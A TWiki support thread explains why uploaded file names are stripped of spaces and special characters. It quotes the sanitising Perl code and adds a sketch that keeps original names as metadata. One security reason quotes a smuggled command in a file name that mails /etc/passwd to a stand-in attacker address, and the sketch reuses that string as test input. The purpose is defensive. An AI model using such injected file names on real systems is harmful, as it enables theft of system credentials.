Question
Uploaded files have their names changed. Spaces and parentheses, in particular, are stripped out.
- e.g., "03-426, 26-Apr-03 (ABC).doc" -> "03-42626-Apr-03ABC.doc"
I have not been able to find anything about this online. Am I missing something?
- TWiki version: 01 Feb 2003
- Perl version: 5.6.1
- Web server & version: Apache 1.3.23
- Server OS: Linux (Red Hat)
- Web browser & version: MIE 5.5
- Client OS: Win Me
--
AlexLane - 27 Apr 2003
Answer
This is controlled by the following code in CVSget:bin/upload, ensuring valid filenames on all platforms and when used in a URL without special encoding:

    # Delete unwanted characters from filename, with I18N
    my $nonAlphaNum = "[^${TWiki::mixedAlphaNum}" . '\._-]+';
    $fileName =~ s/${nonAlphaNum}//go;
    $fileName =~ s/$TWiki::uploadFilter/$1\.txt/goi; # apply security filter
--
PeterThoeny - 30 Apr 2003
In this regard, I have a question and a comment.
Question: Could you summarize (or point to a source that summarizes) what risks one faces by commenting out the line in the code that strips out non-alpha chars?
Comment: I've worked some with a groupware application called PHProjekt, which resembles TWiki in that it has a feature to permit file uploads/downloads. What PHProjekt does is mangle the file name so that the name in the directory is something unintelligible, but users see the real file name in their browsers.
So, how difficult would it be to do something similar in TWiki, i.e., to retain and store the original file name as metadata, for purposes of display and download, so that for example, the file "This file has a corporate name format.doc" is stored as "Thisfilehasacorporatenameformat.doc" but shown on the page with its original name and downloaded similarly? Would this be implementable as a Plugin?
--
AlexLane - 13 May 2003
On your Question: There are several reasons:
1. The file needs to have a valid name on all platforms where TWiki is being installed.
2. An attached file may only contain characters valid in a URL since it can be referenced by URL, e.g. %ATTACHURL%/picture.jpg.
3. Security precaution to prevent attacks like "file with odd chars; mail /etc/passwd hacker@evilplace.org".
4. Ease of implementation, e.g. no extra handling for files with spaces.
On your Comment: Certainly a possibility. See attached sample file testfilewithspace.txt, click on Diffs to see the topic meta data. The path attribute contains the original file name with space. TWiki could be tweaked to return test%20file%20with%20space.txt
--
PeterThoeny - 16 May 2003
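
Added example (not part of the thread and not TWiki's own code): a Perl sketch of the two ideas discussed above, the allow-list stripping from the bin/upload excerpt and keeping the original name as metadata for display. `$mixedAlphaNum` and `$uploadFilter` are constructed stand-ins for the TWiki settings, and `stored_name`, `encoded_original` and `attachment_meta` are hypothetical helpers.

```perl
#!/usr/bin/perl
# Added illustration, not TWiki's own code. $mixedAlphaNum and $uploadFilter
# are constructed stand-ins for $TWiki::mixedAlphaNum and $TWiki::uploadFilter.
use strict;
use warnings;

my $mixedAlphaNum = 'a-zA-Z0-9';                             # assumed: ASCII only
my $uploadFilter  = qr/^(\.htaccess|.*\.(?:php|pl|cgi))$/i;  # assumed pattern

# Name used on disk: the same two steps as the bin/upload excerpt.
sub stored_name {
    my ($name) = @_;
    $name =~ s/[^${mixedAlphaNum}\._-]+//g;   # drop everything not allow-listed
    $name =~ s/$uploadFilter/$1.txt/;         # neutralise executable extensions
    return $name;
}

# Original name, percent-encoded so it is safe inside a URL or an attribute.
# The input is treated as a byte string.
sub encoded_original {
    my ($name) = @_;
    $name =~ s/([^A-Za-z0-9._-])/sprintf('%%%02X', ord($1))/ge;
    return $name;
}

# Hypothetical metadata record: sanitised name for storage, original name
# kept in "path" (the attribute named in the thread), encoded form for links.
sub attachment_meta {
    my ($original) = @_;
    return {
        name => stored_name($original),
        path => $original,
        url  => encoded_original($original),
    };
}

for my $upload (                       # constructed sample uploads
    '03-426, 26-Apr-03 (ABC).doc',
    'test file with space.txt',
    'file with odd chars; mail /etc/passwd hacker@evilplace.org',
    'report.php',
) {
    my $m = attachment_meta($upload);
    printf "%s\n  stored as: %s\n  url form:  %s\n", $m->{path}, $m->{name}, $m->{url};
}
```

The original name is only ever emitted in encoded form and is never used to build a file system path or a command line; the on-disk name comes solely from the allow-list.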